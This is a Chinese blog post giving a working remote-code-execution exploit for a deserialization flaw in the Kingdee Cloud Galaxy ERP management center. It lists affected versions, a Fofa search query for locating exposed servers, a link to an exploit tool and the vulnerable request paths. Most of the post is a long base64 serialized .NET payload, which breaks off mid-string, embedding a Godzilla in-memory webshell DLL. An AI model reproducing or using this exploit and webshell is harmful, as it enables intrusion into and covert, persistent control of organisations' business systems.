首页 > 系统相关 >金蝶erp反序列化RCE+哥斯拉内存马

金蝶erp反序列化RCE+哥斯拉内存马

时间:2024-11-18 10:40:52浏览次数:1  
标签:kdsvc 管理中心 erp 哥斯拉 补丁 Kingdee 版本 序列化

漏洞介绍

由于金蝶云星空管理中心在处理序列化数据时,未对数据进行签名或校验,攻击手可以写入包含恶意代码的序列化数据,系统在进行反序列化时造成远程命令执行,该“管理中心“是提供给管理员使用的管理端,默认开放于8000端口。

影响版本

6.x版本:低于6.2.1012.4
7.x版本:7.0.352.16 至 7.7.0.202111
8.x版本:8.0.0.202205 至 8.1.0.20221110

Fofa语句

app="金蝶云星空-管理中心"

利用工具

https://github.com/Sweelg/Kingdee-erp-Unserialize-RCE

漏洞利用

数据包

POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: your-ip
Content-Type: text/json
 
{"ap0":"asdas","format":"3"}

利用链

POST /Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc?dcInfo=11 HTTP/1.1
POST /Kingdee.BOS.ServiceFacade.ServicesStub.InOutDataService.GetImportOutData.common.kdsvc HTTP/1.1
POST /k3cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1

哥斯拉内存马

24k.aspx 
 AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMdJAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNv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amVjdABTeXN0ZW0uV2ViAElIdHRwSGFuZGxlcgBTeXN0ZW0uV2ViLlJvdXRpbmcASVJvdXRlSGFuZGxlcgBTeXN0ZW0uV2ViLkhvc3RpbmcAVmlydHVhbFBhdGhQcm92aWRlcgBWaXJ0dWFsRmlsZQBWaXJ0dWFsRGlyZWN0b3J5AC5jdG9yAGdldF9Jc1JldXNhYmxlAEh0dHBDb250ZXh0AFByb2Nlc3NSZXF1ZXN0AFJlcXVlc3RDb250ZXh0AEdldEh0dHBIYW5kbGVyAElzUmV1c2FibGUAX3ZpcnR1YWxEaXIAX2ZpbGVDb250ZW50AEluaXRpYWxpemUASXNQYXRoVmlydHVhbABGaWxlRXhpc3RzAERpcmVjdG9yeUV4aXN0cwBHZXRGaWxlAEdldERpcmVjdG9yeQBTeXN0ZW0uV2ViLkNhY2hpbmcAQ2FjaGVEZXBlbmRlbmN5AFN5c3RlbS5Db2xsZWN0aW9ucwBJRW51bWVyYWJsZQBEYXRlVGltZQBHZXRDYWNoZURlcGVuZGVuY3kAZ2V0X0V4aXN0cwBTeXN0ZW0uSU8AU3RyZWFtAE9wZW4ARXhpc3RzAEFycmF5TGlzdABjaGlsZHJlbgBnZXRfQ2hpbGRyZW4AZGlyZWN0b3JpZXMAZ2V0X0RpcmVjdG9yaWVzAGZpbGVzAGdldF9GaWxlcwBDaGlsZHJlbgBEaXJlY3RvcmllcwBGaWxlcwBjb250ZXh0AHJlcXVlc3RDb250ZXh0AHZpcnR1YWxEaXIAZmlsZUNvbnRlbnQAdmlydHVhbFBhdGgAdmlydHVhbFBhdGhEZXBlbmRlbmNpZXMAdXRjU3RhcnQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAGV1ZWRkeHN5AFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9VVEY4AENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBHZXRTdHJpbmcAZ2V0X0N1cnJlbnQASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAZ2V0X0N1cnJlbnRFeGVjdXRpb25GaWxlUGF0aABDaGFyAFN0cmluZwBUcmltRW5kAFRvTG93ZXIAZ2V0X0FwcGxpY2F0aW9uUGF0aABJbmRleE9mAGdldF9MZW5ndGgAUmVtb3ZlAExhc3RJbmRleE9mAFN1YnN0cmluZwBDb25jYXQAUmVwbGFjZQBNYXJzaGFsQnlSZWZPYmplY3QASW5pdGlhbGl6ZUxpZmV0aW1lU2VydmljZQBTeXN0ZW0uV2ViLkNvbXBpbGF0aW9uAEJ1aWxkTWFuYWdlcgBnZXRfSXNQcmVjb21waWxlZEFwcABUeXBlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFN5c3RlbS5SZWZsZWN0aW9uAEZpZWxkSW5mbwBCaW5kaW5nRmxhZ3MAR2V0RmllbGQAR2V0VmFsdWUAQm9vbGVhbgBTZXRWYWx1ZQBIb3N0aW5nRW52aXJvbm1lbnQAUmVnaXN0ZXJWaXJ0dWFsUGF0aFByb3ZpZGVyAG9wX0luZXF1YWxpdHkASHR0cFJlc3BvbnNlAGdldF9SZXNwb25zZQBDbGVhcgBzZXRfQnVmZmVyT3V0cHV0AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAUmFuZG9tAE5leHQASW50MzIARXhlY3V0ZQBFbmQAVG9TdHJpbmcASHR0cFV0aWxpdHkAVXJsRW5jb2RlAEFkZEhlYWRlcgBFeGNlcHRpb24AVmlydHVhbFBhdGhVdGlsaXR5AFRvQXBwUmVsYXRpdmUAQ29udGFpbnMAZ2V0X1ByZXZpb3VzAEdldEJ5dGVzAE1lbW9yeVN0cmVhbQBJc051bGxPckVtcHR5AEFkZAAAjrlQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsATQBqAEkAaQBVACsAUABDAFYAMABjAG4AawBnAGUAeQBCAHoAZABIAEoAcABiAG0AYwBnAGEAMgBWADUASQBEADAAZwBJAGoATgBqAE4AbQBVAHcAWQBqAGgAaABPAFcATQB4AE4AVABJAHkATgBHAEUAaQBPAHkAQgB6AGQASABKAHAAYgBtAGMAZwBjAEcARgB6AGMAeQBBADkASQBDAEoAdwBZAFgATgB6AEkAagBzAGcAYwAzAFIAeQBhAFcANQBuAEkARwAxAGsATgBTAEEAOQBJAEYATgA1AGMAMwBSAGwAYgBTADUAQwBhAFgAUgBEAGIAMgA1ADIAWgBYAEoAMABaAFgASQB1AFYARwA5AFQAZABIAEoAcABiAG0AYwBvAGIAbQBWADMASQBGAE4ANQBjADMAUgBsAGIAUwA1AFQAWgBXAE4AMQBjAG0AbAAwAGUAUwA1AEQAYwBuAGwAdwBkAEcAOQBuAGMAbQBGAHcAYQBIAGsAdQBUAFUAUQAxAFEAMwBKADUAYwBIAFIAdgBVADIAVgB5AGQAbQBsAGoAWgBWAEIAeQBiADMAWgBwAFoARwBWAHkASwBDAGsAdQBRADIAOQB0AGMASABWADAAWgBVAGgAaABjADIAZwBvAFUAMwBsAHoAZABHAFYAdABMAGwAUgBsAGUASABRAHUAUgBXADUAagBiADIAUgBwAGIAbQBjAHUAUgBHAFYAbQBZAFgAVgBzAGQAQwA1AEgAWgBYAFIAQwBlAFgAUgBsAGMAeQBoAHcAWQBYAE4AegBJAEMAcwBnAGEAMgBWADUASwBTAGsAcABMAGwASgBsAGMARwB4AGgAWQAyAFUAbwBJAGkAMABpAEwAQwBBAGkASQBpAGsANwBJAEcASgA1AGQARwBWAGIAWABTAEIAawBZAFgAUgBoAEkARAAwAGcAVQAzAGwAegBkAEcAVgB0AEwAawBOAHYAYgBuAFoAbABjAG4AUQB1AFIAbgBKAHYAYgBVAEoAaABjADIAVQAyAE4ARgBOADAAYwBtAGwAdQBaAHkAaABEAGIAMgA1ADAAWgBYAGgAMABMAGwASgBsAGMAWABWAGwAYwAzAFIAYgBjAEcARgB6AGMAMQAwAHAATwB5AEIAawBZAFgAUgBoAEkARAAwAGcAYgBtAFYAMwBJAEYATgA1AGMAMwBSAGwAYgBTADUAVABaAFcATgAxAGMAbQBsADAAZQBTADUARABjAG4AbAB3AGQARwA5AG4AYwBtAEYAdwBhAEgAawB1AFUAbQBsAHEAYgBtAFIAaABaAFcAeABOAFkAVwA1AGgAWgAyAFYAawBLAEMAawB1AFEAMwBKAGwAWQBYAFIAbABSAEcAVgBqAGMAbgBsAHcAZABHADkAeQBLAEYATgA1AGMAMwBSAGwAYgBTADUAVQBaAFgAaAAwAEwAawBWAHUAWQAyADkAawBhAFcANQBuAEwAawBSAGwAWgBtAEYAMQBiAEgAUQB1AFIAMgBWADAAUQBuAGwAMABaAFgATQBvAGEAMgBWADUASwBTAHcAZwBVADMAbAB6AGQARwBWAHQATABsAFIAbABlAEgAUQB1AFIAVwA1AGoAYgAyAFIAcABiAG0AYwB1AFIARwBWAG0AWQBYAFYAcwBkAEMANQBIAFoAWABSAEMAZQBYAFIAbABjAHkAaAByAFoAWABrAHAASwBTADUAVQBjAG0ARgB1AGMAMgBaAHYAYwBtADEARwBhAFcANQBoAGIARQBKAHMAYgAyAE4AcgBLAEcAUgBoAGQARwBFAHMASQBEAEEAcwBJAEcAUgBoAGQARwBFAHUAVABHAFYAdQBaADMAUgBvAEsAVABzAGcAYQBXAFkAZwBLAEUATgB2AGIAbgBSAGwAZQBIAFEAdQBVADIAVgB6AGMAMgBsAHYAYgBsAHMAaQBjAEcARgA1AGIARwA5AGgAWgBDAEoAZABJAEQAMAA5AEkARwA1ADEAYgBHAHcAcABJAEgAcwBnAFEAMgA5AHUAZABHAFYANABkAEMANQBUAFoAWABOAHoAYQBXADkAdQBXAHkASgB3AFkAWABsAHMAYgAyAEYAawBJAGwAMABnAFAAUwBBAG8AVQAzAGwAegBkAEcAVgB0AEwAbABKAGwAWgBtAHgAbABZADMAUgBwAGIAMgA0AHUAUQBYAE4AegBaAFcAMQBpAGIASABrAHAAZABIAGwAdwBaAFcAOQBtAEsARgBOADUAYwAzAFIAbABiAFMANQBTAFoAVwBaAHMAWgBXAE4AMABhAFcAOQB1AEwAawBGAHoAYwAyAFYAdABZAG0AeAA1AEsAUwA1AEgAWgBYAFIATgBaAFgAUgBvAGIAMgBRAG8ASQBrAHgAdgBZAFcAUQBpAEwAQwBCAHUAWgBYAGMAZwBVADMAbAB6AGQARwBWAHQATABsAFIANQBjAEcAVgBiAFgAUwBCADcASQBIAFIANQBjAEcAVgB2AFoAaQBoAGkAZQBYAFIAbABXADEAMABwAEkASAAwAHAATABrAGwAdQBkAG0AOQByAFoAUwBoAHUAZABXAHgAcwBMAEMAQgB1AFoAWABjAGcAYgAyAEoAcQBaAFcATgAwAFcAMQAwAGcAZQB5AEIAawBZAFgAUgBoAEkASAAwAHAATwB5AEEANwBJAEgAMABnAFoAVwB4AHoAWgBTAEIANwBJAEYATgA1AGMAMwBSAGwAYgBTADUASgBUAHkANQBOAFoAVwAxAHYAYwBuAGwAVABkAEgASgBsAFkAVwAwAGcAYgAzAFYAMABVADMAUgB5AFoAVwBGAHQASQBEADAAZwBiAG0AVgAzAEkARgBOADUAYwAzAFIAbABiAFMANQBKAFQAeQA1AE4AWgBXADEAdgBjAG4AbABUAGQASABKAGwAWQBXADAAbwBLAFQAcwBnAGIAMgBKAHEAWgBXAE4AMABJAEcAOABnAFAAUwBBAG8ASwBGAE4ANQBjADMAUgBsAGIAUwA1AFMAWgBXAFoAcwBaAFcATgAwAGEAVwA5AHUATABrAEYAegBjADIAVgB0AFkAbQB4ADUASwBVAE4AdgBiAG4AUgBsAGUASABRAHUAVQAyAFYAegBjADIAbAB2AGIAbABzAGkAYwBHAEYANQBiAEcAOQBoAFoAQwBKAGQASwBTADUARABjAG0AVgBoAGQARwBWAEoAYgBuAE4AMABZAFcANQBqAFoAUwBnAGkAVABGAGsAaQBLAFQAcwBnAGIAeQA1AEYAYwBYAFYAaABiAEgATQBvAFEAMgA5AHUAZABHAFYANABkAEMAawA3AEkARwA4AHUAUgBYAEYAMQBZAFcAeAB6AEsARwA5ADEAZABGAE4AMABjAG0AVgBoAGIAUwBrADcASQBHADgAdQBSAFgARgAxAFkAVwB4AHoASwBHAFIAaABkAEcARQBwAE8AeQBCAHYATABsAFIAdgBVADMAUgB5AGEAVwA1AG4ASwBDAGsANwBJAEcASgA1AGQARwBWAGIAWABTAEIAeQBJAEQAMABnAGIAMwBWADAAVQAzAFIAeQBaAFcARgB0AEwAbABSAHYAUQBYAEoAeQBZAFgAawBvAEsAVABzAGcAUQAyADkAdQBkAEcAVgA0AGQAQwA1AFMAWgBYAE4AdwBiADIANQB6AFoAUwA1AFgAYwBtAGwAMABaAFMAaAB0AFoARABVAHUAVQAzAFYAaQBjADMAUgB5AGEAVwA1AG4ASwBEAEEAcwBJAEQARQAyAEsAUwBrADcASQBFAE4AdgBiAG4AUgBsAGUASABRAHUAVQBtAFYAegBjAEcAOQB1AGMAMgBVAHUAVgAzAEoAcABkAEcAVQBvAFUAMwBsAHoAZABHAFYAdABMAGsATgB2AGIAbgBaAGwAYwBuAFEAdQBWAEcAOQBDAFkAWABOAGwATgBqAFIAVABkAEgASgBwAGIAbQBjAG8AYgBtAFYAMwBJAEYATgA1AGMAMwBSAGwAYgBTADUAVABaAFcATgAxAGMAbQBsADAAZQBTADUARABjAG4AbAB3AGQARwA5AG4AYwBtAEYAdwBhAEgAawB1AFUAbQBsAHEAYgBtAFIAaABaAFcAeABOAFkAVwA1AGgAWgAyAFYAawBLAEMAawB1AFEAMwBKAGwAWQBYAFIAbABSAFcANQBqAGMAbgBsAHcAZABHADkAeQBLAEYATgA1AGMAMwBSAGwAYgBTADUAVQBaAFgAaAAwAEwAawBWAHUAWQAyADkAawBhAFcANQBuAEwAawBSAGwAWgBtAEYAMQBiAEgAUQB1AFIAMgBWADAAUQBuAGwAMABaAFgATQBvAGEAMgBWADUASwBTAHcAZwBVADMAbAB6AGQARwBWAHQATABsAFIAbABlAEgAUQB1AFIAVwA1AGoAYgAyAFIAcABiAG0AYwB1AFIARwBWAG0AWQBYAFYAcwBkAEMANQBIAFoAWABSAEMAZQBYAFIAbABjAHkAaAByAFoAWABrAHAASwBTADUAVQBjAG0ARgB1AGMAMgBaAHYAYwBtADEARwBhAFcANQBoAGIARQBKAHMAYgAyAE4AcgBLAEgASQBzAEkARABBAHMASQBIAEkAdQBUAEcAVgB1AFoAMwBSAG8ASwBTAGsAcABPAHkAQgBEAGIAMgA1ADAAWgBYAGgAMABMAGwASgBsAGMAMwBCAHYAYgBuAE4AbABMAGwAZAB5AGEAWABSAGwASwBHADEAawBOAFMANQBUAGQAVwBKAHoAZABIAEoAcABiAG0AYwBvAE0AVABZAHAASwBUAHMAZwBmAFMAQgA5AEkARwBOAGgAZABHAE4AbwBJAEMAaABUAGUAWABOADAAWgBXADAAdQBSAFgAaABqAFoAWABCADAAYQBXADkAdQBLAFMAQgA3AEkASAAwAEsASgBUADQAPQAACy4AYQBzAHAAeAAAAQADLwAACy8AMgA0AGsALwAABS8ALwAAIV8AdABoAGUAQgB1AGkAbABkAE0AYQBuAGEAZwBlAHIAADNfAGkAcwBQAHIAZQBjAG8AbQBwAGkAbABlAGQAQQBwAHAAQwBvAG0AcAB1AHQAZQBkAAAjXwBpAHMAUAByAGUAYwBvAG0AcABpAGwAZQBkAEEAcABwAAATZwBoAG8AcwB0AGYAaQBsAGUAAA1FAHIAcgBvAHIAcwAAA1wAAAdjADoAXAAAHy8AZwBoAG8AcwB0AGYAaQBsAGUALgBhAHMAcAB4AADUefYZpMWMSLcmfCnLwAHoAAi3elxWGTTgiQiwP19/EdUKOgMgAAEDIAACBSABARIdBiABEgkSIQMoAAICBg4FIAIBDg4EIAECDgUgARIVDgUgARIZDgkgAxIlDhIpES0EIAASMQQgAQEOAwYSNQQgABIpBCgAEikEIAEBCAQAABJBBQABHQUOBSABDh0FBAAAEh0EIAASSQMgAA4FIAEOHQMEIAEIDgMgAAgFIAIOCAgFAAIODg4FIAIODg4DIAAcAwAAAgYAARJdEWEHIAISZQ4RaQQgARwcBSACARwcBQABARIRBwACAhJlEmUEIAASdQQgAQECBCAAEnkEIAEICAUAAQ4dHAQAAQ4OHQcSDg4ODggODhIQEmUSZRwcHBJdEmUSgIkdAx0cBAcBHQMDBwEOBCAAEhEFIAEdBQ4FIAEBHQUEBwESMQUAAgIODgQAAQIOBCABCBwIBwQOCBIUHQMIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAACYQgAAAAAAAAAAAACuQgAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoEIAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWGAAAEwCAAAAAAAAAAAAAEwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASsAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACIAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAADwADQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAZQB1AGUAZABkAHgAcwB5AC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABEAA0AAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAb